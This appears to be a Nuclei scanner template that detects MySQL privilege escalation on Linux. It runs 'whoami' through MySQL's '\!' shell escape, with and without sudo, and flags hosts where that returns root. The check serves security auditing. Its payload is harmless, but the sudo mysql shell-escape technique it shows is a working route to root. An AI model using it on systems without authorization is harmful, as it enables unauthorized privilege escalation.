id: privesc-mysql

info:
  name: MySQL - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for managing and manipulating data. It is widely used for web applications and is known for its reliability, ease of use, and performance. MySQL is a popular choice for database-driven applications and is supported on various platforms.
  reference:
    - https://gtfobins.github.io/gtfobins/mysql/
  metadata:
    max-request: 3
    verified: true
  tags: code,linux,mysql,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      mysql -e '\! whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo mysql -e '\! whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022100f0915f830a1450880b842a1736e9aa1821f3bbe134ba9829e392f07a156a3635022005963824876337888c58c1970fbd0774e0978b986fd09fe2370505b9883cb521:922c64590222798bb761d5b6d8e72950